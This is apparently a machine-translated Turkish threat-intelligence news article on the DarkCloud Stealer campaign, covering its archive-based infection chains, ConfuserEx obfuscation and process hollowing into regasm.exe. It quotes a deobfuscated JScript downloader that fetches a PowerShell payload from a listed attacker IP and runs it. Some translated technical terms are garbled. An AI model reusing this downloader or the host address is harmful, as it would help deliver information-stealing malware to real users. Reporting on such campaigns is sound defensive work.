
Geleneksel güvenlik kontrollerinden kaçınmak için gelişmiş gizleme teknikleri ve çoklu enfeksiyon vektörlerini kullanarak gelişmiş bir bilgi çalan kötü amaçlı yazılım kampanyası ortaya çıktı.
İlk olarak son tehdit istihbarat raporlarında belgelenen DarkCloud Stealer, siber suçlu taktiklerde önemli bir evrimi temsil eder, görünüşte zararsız arşiv dosyaları ile başlayan ve yoğun bir şekilde gizlenmiş bir görsel temel 6 yükünün dağıtılmasında doruğa ulaşan karmaşık bir çok aşamalı dağıtım mekanizması kullanır.
Kötü amaçlı yazılım operatörleri, her biri başarılı sistem uzlaşma olasılığını en üst düzeye çıkarmak için tasarlanmış üç ayrı enfeksiyon yolu geliştirmiştir.
Bunlar arasında PowerShell komut dosyalarını indiren JavaScript ile başlatılan zincirler, gizlenmiş JScript kodlu Windows komut dosyası dosyaları içeren 7Z arşivleri ve alternatif giriş noktaları görevi gören katran arşivleri bulunur.
Her vektör, kullanıcı şüphesini atlamak için genellikle meşru iş belgeleri veya yazılım güncellemeleri olarak görünen sofistike sosyal mühendislik gösterir.
Nisan 2025’ten bu yana gözlemlenen son kampanyalar, tehdit aktörlerinin yaklaşımlarını önemli ölçüde geliştirdiğini ve daha önce belgelenmiş otomatik tabanlı uygulamalardan daha karmaşık .NET tabanlı gizleme çerçevelerine doğru ilerlediklerini gösteriyor.
Palo Alto Networks araştırmacıları, bu değişimi, kötü niyetli amaçlar için kurumsal sınıf geliştirme araçlarını benimseme, tespit ve analizi güvenlik ekipleri için önemli ölçüde daha zor hale getirme siber suçlular arasında daha geniş bir eğilimin bir parçası olarak tanımladılar.
Kötü amaçlı yazılımların etkisi, uzun süreler boyunca tespit edilmemesini sağlayan gelişmiş kalıcılık mekanizmaları ve anti-analiz özelliklerini içeren geleneksel veri hırsızlığının ötesine uzanır.
Birden fazla kötü niyetli PowerShell komut dosyası barındıran komut ve kontrol sunucuları da dahil olmak üzere kampanyanın altyapısı, önemli planlama ve geliştirme yatırımı ile iyi kaynaklı bir operasyon önermektedir.
Confuserex gizleme ve süreç enjeksiyon mekaniği
DarkCloud Stealer’ın teknik gelişmişliği, kötü niyetli kullanım için yeniden tasarlanmış meşru bir .NET uygulama koruyucusu olan Confuserex tabanlı Obfuscation’ın uygulanmasında belirgin hale gelir.
.webp)
Kötü amaçlı yazılım, okunabilir kodu anlaşılmaz talimat dizilerine dönüştüren anti-ayarlama önlemleri, sembol yeniden adlandırma ve kontrol akışı gizlemesi dahil olmak üzere çoklu koruma katmanları kullanır.
Deobfuscated JavaScript indirici, ilk enfeksiyon mekanizmasını ortaya çıkarır:-
var rDFG = "C:\\Temp\\" + RandomName() + ".ps1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var shell = new ActiveXObject("WScript.Shell");
var http = new ActiveXObject('MSXML2.XMLHTTP');
if (Dwnld("http://176.65.142.190/Blackyy/kay.ps1", rDFG)) {
ExePSh(rDFG);
}
Bu komut dosyası, PowerShell yüklerini açık dizin sunucularından indirir ve sistemin geçici dizininde rastgele adlandırılmış dosyalar oluşturur.
Sonraki PowerShell komut dosyası, şifresini çözdüğünde, Confuserex’in karşıtı ayarlayıcı özellikleri tarafından korunan başka bir yürütülebilir dosyayı ortaya çıkaran Base64 kodlu ve AES ile şifreli veriler içerir.
Son aşama, “holographies.exe” adlı şifre çözülmüş VB6 yükünü meşru bir .NET çerçeve yardımcı programı olan regasm.exe’ye enjekte ederek süreç oyununun kullanılması.
Bu teknik, kötü amaçlı yazılımın güvenilir bir süreç bağlamında yürütülmesini sağlar ve birçok uç nokta güvenlik çözümünü etkili bir şekilde atlar.
Yükün içindeki kritik dizeler, benzersiz anahtarlarla RC4 Stream Cipher şifrelemesini kullanır, statik analiz çabalarını daha da karmaşıklaştırır ve yazarların kaçınma taahhüdünü gösterir.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın